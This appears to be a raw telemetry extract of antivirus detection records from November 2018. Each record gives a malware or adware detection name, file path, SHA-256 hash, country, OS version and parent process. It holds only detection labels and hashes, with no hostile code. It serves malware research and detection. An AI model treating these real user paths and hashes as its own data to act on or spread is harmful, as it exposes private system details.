  Row(detection=Row(filename='avscan-20181102-112426-9bb05318', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-112426-9BB05318', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='a464cfca96ded1ffdda173e691e6267d3989466383a09e803f720b37862c254c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:26:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\1fljnoj43kq\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:15:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\35swaq1u3vm\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:19:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131728-2ef2c828', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3595c44b\\AVSCAN-20181102-131631-285D853F\\AVSCAN-20181102-131728-2EF2C828', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:17:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nskF8A3.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official(1).exe', parentsize=268416568, timestamp='2018-11-02T14:52:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-112435-65996f90', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0e60e1d9\\AVSCAN-20181102-112150-5647471F\\AVSCAN-20181102-112435-65996F90', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='eb812853fb6d15b4d726921d8413f53610beae48458f76537009f4cc2b8674af', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:24:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141910-a2a15bcf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2bce2617\\AVSCAN-20181102-141843-9DDB982A\\AVSCAN-20181102-141910-A2A15BCF', filesize=1536000, name='TR/CoinMiner.CZ.#M1.#R1'), hash='ea74978487a83ede72c7c95d321d0481ce24c66b678af4114b16d4f89b1e09a5', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:18:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a571371344c6f939b862c5cb2e6d53203f79248bb9beb9aa7e1b53190970e9f0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\A571371344C6F939B862C5CB2E6D53203F79248BB9BEB9AA7E1B53190970E9F0', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a571371344c6f939b862c5cb2e6d53203f79248bb9beb9aa7e1b53190970e9f0', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:44:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='$rmzeztw.exe', filepath='\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-966121994-3784430241-111158856-1000\\$RMZEZTW.exe', filesize=1772000, name='Adware/DealPly.rgkgs.#M1.#R1'), hash='bdc4485723a6c5dbbf891d433e18d3726dd27207d37ecba8cfa08c5206bfa57e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:51:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023d1f3', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023d1f3', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:46:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00295ed2', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00295ed2', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:13:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029034c', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029034c', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:29:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-184906-d2be3955', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-184906-D2BE3955', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T17:49:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239f01', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239f01', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:50:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsgE319.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:42:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsr5B54.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:43:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ufrii_driver_v2120_w32_sc_12.exe', filepath='H:\\ISMAIL 2018.11.4\\ISMAIL BACHA 2018\\Canon iR1133\\canon\\UFRII_Driver_V2120_W32_SC_12.exe', filesize=33280000, name='W32/Sality.AT.#M1.#R1'), hash='d11531a2035dac5df815d6d6ea48bd2db0e19a01b256a5fd60fac4cdfb0dda85', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2065448, timestamp='2018-11-04T11:15:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e8c0f3538f1491f287def2a2a1bfea05a0da164bb365522b2294b772871b7a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T03:37:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0028fdc5', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0028fdc5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:23:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename="inv_159436263_from_kunde, d'amore and doyle_8755981.pdf.zip --> avulsed standing price blank cartridge.exe", filepath="Inv_159436263_from_Kunde, D'Amore and Doyle_8755981.pdf.zip --> avulsed standing price blank cartridge.exe", filesize=64000, name='TR/Dldr.Upatre.SN.#M0.#R0'), hash='ff176cdf9d3ab8f5f26c86f1da545ff3608187001ecbb3225703823e8a9d4722', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:53:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-120206-5477945a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_12cb16c6\\AVSCAN-20181104-120146-51C54548\\AVSCAN-20181104-120206-5477945A', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='ed9dab9bf727d1f1a9fb1b206024b66130ef0437038c5a821870e5712a1d2d38', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:02:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='winword.exe', filepath='C:\\Program Files\\Microsoft Office\\OFFICE11\\WINWORD.EXE', filesize=12380000, name='W32/Sality.AT.#M1.#R1'), hash='ec59c65d6066a84f6ff92def38fbf1792a5f44ac81eb7490a8d3fd47be7448cd', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:23:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='newfolder.exe', filepath='H:\\NewFolder.exe', filesize=0, name='TR/Spy.Gen.#M2.#R1185'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:58:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[4].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[4].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:24:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='daemontoolspro550-0388.exe', filepath='F:\\Delphi Neu\\Delphi 2014.3 FULL\\Delphi 2014.3 FULL\\DAEMONToolsPro550-0388.exe', filesize=19904000, name='W32/Sality.AT.#M1.#R1'), hash='f66a31e176ef3abc894ccde534753a48fe5ff4b75f094db7e9ae92163c6ee34d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T11:34:57Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T14:45:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Pictures.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='3b8aa04b3f598a011ad5cd5d8faa0540738d632d768ae5d1a7c776557c31ec78', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:57:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-02T18:55:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131156-80285211', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130408-3969CC04\\AVSCAN-20181102-131156-80285211', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:11:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3291609\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Downloads\\Baixaki_Image Comparator_1353295777.exe', parentsize=2292152, timestamp='2018-11-02T02:31:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:23:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:58:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:43:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2391280, timestamp='2018-11-02T16:50:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:16:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:49:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='s0017mdfl.dll', filepath='G:\\Program Files\\Miracle Falcon Box\\Bin\\s0017mdfl.dll', filesize=4992000, name='DR/Delphi.Gen.#M300.#R491'), hash='6effd6351227497ea1e1d697792f0b7050faf5fc051144d52122171fc9a84a0e', metadata=Row(cmdline='-r', country='VE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T19:24:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-124211-32b072cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4b6a03a9\\AVSCAN-20181102-124137-2D27D6DC\\AVSCAN-20181102-124211-32B072CB', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:41:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='start.exe', filepath='\\\\192.168.0.100\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\生產管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='425632d45efdb7dd22ce3554f0d2cb222a02b0875f26746bcd5550470e73a9da', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:1upUepgZNU2jR\\\\\\/+9.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:02:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:02:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-07-20-56.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-30T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T01:30:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='1f06e353466caf56f94fcd51601058b7064dd9dca386e84e4636a7e8a661078f', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T13:42:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gdpinst.exe', filepath='D:\\pro\\ahmed hamdy\\install\\driver\\gdi\\32\\eng\\gDPInst.exe', filesize=1000000, name='W32/Sality.AT.#M1.#R1'), hash='3aacc0774a4500eaab8fe162104a75243e73e5d2ee44e8c3ea7e635f3218fcaa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:17:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-200843-563eca07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5dd34c2a\\AVSCAN-20181102-195753-0AC336D2\\AVSCAN-20181102-200843-563ECA07', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:08:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134013-782e4aa4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8c0b591\\AVSCAN-20181102-133957-75C5DDEB\\AVSCAN-20181102-134013-782E4AA4', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:10:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-191705-0966e30a', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_5189a34d\\AVSCAN-20181102-184958-774024B1\\AVSCAN-20181102-191705-0966E30A', filesize=96000, name='PUA/FindWide.#M1.#R1'), hash='19f9df7b544f1a348919908811f5b52f666afb91d51847b767f07131661b2bd0', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:16:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mm.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\mm\\mm.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134249-88dbfdee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134249-88DBFDEE', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:04:56Z'), dt=datetime.date(2018, 11, 2)),
